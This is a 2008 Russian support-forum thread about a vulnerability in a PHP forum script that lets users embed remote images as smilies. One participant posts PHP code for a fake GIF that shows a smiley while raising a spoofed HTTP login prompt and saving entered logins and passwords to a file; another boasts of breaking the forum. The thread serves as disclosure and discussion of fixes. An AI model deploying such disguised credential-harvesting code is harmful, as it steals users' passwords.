Бесплатные PHP скрипты - форум техподдержки

Бесплатные PHP скрипты - форум техподдержки

Форум техподдержки WR-Скриптов на php. Обсуждаем: основы программирования на PHP 5 - 7 версий, различные подходы к написанию скриптов на php 7 без MySQL. А также WR-скрипты: бесплатные доски объявлений, скрипты форумов, Гостевые книги, Каталог ссылок, Галерея, Фотоальбом, Счётчики, Рассылки, Анекдот и другие. Принимаются пожелания для новых версий. Сообщите какой скрипт нужен для Вашего сайта, постараемся найти или реализовать. Скачать скрипты можно бесплатно. Вместе мы сделаем бесплатные php скрипты лучше и доступнее!

Главная сайта бесплатных php скриптовГлавная сайта   ПоискПоиск  
Сегодня: 22.11.2024 - 13:01:11
Страницы:  1  2  

Уязвимость IMG

Объявление - WR-Scriptы в UTF-8 кодировке

Активно обновляю скрипты и перевожу их в UTF-8 кодировку. Список перекодированных php скриптов доступен на главной странице сайта. Скачивайте скрипты и устанавливайте на свой сайт! В ближайшее время обновлю каталог знакомств, форум Про, фотоальбом, доски объявлений лайт и ЛЮКС.

На форуме, пожалуйста, пишите что модернизировать в скриптах в первую очередь. Постараюсь исправить большую часть пожеланий!
Планирую продолжить работы весь 2023 год.

АвторСообщение

shumee

S
Участник форума

Здраствуйте Михаил. Опять в тему о уязвимостях. Заметил я вот что...

При добавлении поста в тему...нажал на ссылку "ещё смайлы". Кликнув на один из смайликов, в форму вставился путь (к примеру)
Тоесть я понял то, что возможно вставлять удалённые картинки. Отойдя от тему хочу сказать, что я уже когда-то вёл дискуссию о вреде возможности закачек и удалённых картинок на сайт на всем известном форму PHPBB. так что приведу пример использования этой "уязвимости" в твоём случае.

Представь,у меня есть домен с php хостингом. Создаём небольшой скрипт:

Картинка smile_normal.gif (это у нас будет обычный смайлик)
Вредоносный код (smile.gif) (это у нас будет вредоносный код) Чуть ниже я представлю тебе часть его содержимого.
Файл дополнительной конфигурации htaccess (очень грубо говоря....чтобы запускать расширение gif как php
наша база с награбленным data.txt

Часть вредоносного smile.gif

Код:


<?
error_reporting (0);
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом
$image = imagecreatefromgif('smile_normal.gif');

........Вредоносный КОД Тут очень много вариантов я делал сбор куков и т.д.


//запишем в файл
$f = fopen('data.txt', 'ab'); //data.txt
fwrite($f, $text\r\n");
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>


Указываем у тебя в посте
У тебя на сайте картинка будет отображаться обычным смайлом, а вот у меня ..... это зависит от содержимого вредоносный КОДа.

Так что я считаю актуальным подумать над этим и предлагаю убрать (на мой взгляд) эту уязвимость.

Сообщение # 1 15.10.08 - 19:01:44

admin7

A
Участник форума

а если у меня не data.txt

Сообщение # 2 15.10.08 - 23:03:38

shumee

S
Участник форума


Цитата:

admin7а если у меня не data.txt
Ну ничего, у меня тоже не data.txt

Сообщение # 3 16.10.08 - 03:10:40

WR

W
Участник форума

shumee, этот скрипт же не будет работать. Пример есть взлома или кражи данных таким способом?

Сообщение # 4 16.10.08 - 04:27:44

shumee

S
Участник форума

WR

Цитата:

shumee, этот скрипт же не будет работать. Пример есть взлома или кражи данных таким способом?


УВЕРЯЮ ВАС МИХАИЛ РАБОТАЕТ ! Вот тебе один из способ "на дурака" :

Код:

<?
error_reporting (0);
//делаем скрипт картинкой
header("Content-type: image/gif");
//делаем изображение смайликом из архива
$image = imagecreatefromgif('smile.gif');
if(!$_COOKIE['LOGON'])
{
$login = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
//Авторизация пройдёт, если пароль больше 4-ёх символов и вообще написан логин
if(strlen($pass) <= 4 &#124;&#124; !$login)
{
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="https://www.wr-script.ru - login"');
}

elseif($login)
{
//ставим печеньку, чтобы при повторном заходе авторизации небыло, в самом начале проверка есть ли печенька))
setcookie('LOGON',md5($pass));
//запишем пароли в файл
$f = fopen('passwords.txt', 'ab'); //passwords.txt
fwrite($f, $login." &#124;&#124;&#124; ".$pass."\r\n"); //в формате LOGIN &#124;&#124;&#124; PASSWORD
fclose($f);
}
}
imagegif($image);
imagedestroy($image);
?>


Если уж есть огромное желание, могу продемонстрировать !

Сообщение # 5 16.10.08 - 06:16:40

P_a_FF_o_S

P
гость

Честно говоря форум ломается очень быстро, мне хватило 10 минут на постановку идеи, 30 минут на написание PHPскрипта и 10 секунд на взлом....
а за основу взял всего лишь проверку наличия файла, вытягивание файла себе, редактирование (как захочу, в том числе и пароль админа), и если нужно запись файла назад, и никакой пароль и .htacсess не спасает, проверено на чужом опыте=)))

Сообщение # 6 17.10.08 - 15:58:15

shumee

S
Участник форума

P_a_FF_o_S, хоть поделелси бы своим мега хакерским скриптом для взлома сайта за 10 секунд

Хотелось бы узнать, что я пропустил

Сообщение # 7 17.10.08 - 00:16:32

WR

W
Участник форума

ясно, проблема серьёзная.

Какие будет предложения по защите от взлома скрипта? На что проверять каждую картинку, что инклюдится на сайт.

Сообщение # 8 17.10.08 - 10:37:28

P_a_FF_o_S

P
гость

shumee, ну с шараги прийду чем могу поделюсь, тока жаль не везде катит, короче есть несколько нюансов , их надо просто доработать

Сообщение # 9 17.10.08 - 11:41:11

shumee

S
Участник форума

WR, да было бы идеально вообще убрать возможность инклуда картинки (смайлов). Тоесть сделать доступными только те, что "в базе".

Сообщение # 10 17.10.08 - 14:04:05

мимо

М
гость

и я так думаю

Сообщение # 11 13.12.08 - 16:43:36

And

A
Участник форума

а что если в обработку bb-кода вставить строку


Код:

$text=str_replace("[img]http://","",$text);

Сообщение # 12 13.12.08 - 22:37:11
Гостевая книга XXS :Предыдущая темаСледующая тема: Репутация
Страницы:  1  2  

Сообщение
Имя E-mail
Сообщение

Нажмите на точку возле имени для обращения к участнику

Смайлы:

Ещё смайлы
Эмодзи
         
Защитный код: (введите цифры, которые на синем фоне)
Ответ на вопрос: (Какой сейчас год?)
   
WR-Счётчик
Powered by WR-Forum Professional © 2.3 UTF-8 beta версия